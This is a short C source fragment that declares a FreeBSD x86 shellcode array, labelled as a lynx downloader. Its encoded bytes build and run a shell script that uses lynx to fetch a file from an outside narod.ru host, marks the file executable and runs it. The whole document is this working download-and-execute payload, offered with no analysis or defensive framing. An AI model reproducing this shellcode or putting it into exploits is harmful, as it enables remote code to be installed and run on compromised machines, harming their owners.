/* lynx download shellcode 4 fbsd x86 
length = 177 bytes */

char bsd_lynx_downloadr [] = 
"\x31\xC0\x50\x68\x2F\x62\x69\x6E\x89\xE3\x53\x6A\x0C"
"\x50\xCD\x80\x31\xC0\x50\x68\x7A\x79\x78\x61\x89\xE3"
"\x66\x68\x55\x07\x66\x68\x01\x02\x53\x6A\x05\x50\xCD"
"\x80\x89\xC2\x31\xC0\x50\x68\x0A\x2E\x2F\x62\x68\x2B"
"\x78\x20\x62\x68\x6D\x6F\x64\x20\x68\x62\x0A\x63\x68"
"\x68\x62\x20\x3E\x20\x68\x2E\x72\x75\x2F\x68\x61\x72"
"\x6F\x64\x68\x38\x33\x2E\x6E\x68\x63\x65\x20\x66\x68"
"\x73\x6F\x75\x72\x68\x6E\x78\x20\x2D\x68\x68\x0A\x6C"
"\x79\x68\x69\x6E\x2F\x73\x68\x23\x21\x2F\x62\x89\xE3"
"\x6A\x38\x53\x52\x6A\x04\x50\xCD\x80\x31\xC0\x52\x6A"
"\x06\x50\xCD\x80\x31\xC0\x50\x68\x6E\x2F\x73\x68\x68"
"\x2F\x2F\x62\x69\x89\xE3\x50\x68\x7A\x79\x78\x61\x89"
"\xE1\x50\x51\x53\x89\xE2\x50\x52\x53\x6A\x3B\x50\xCD"
"\x80\x31\xC0\x6A\x01\x50\xCD\x80";


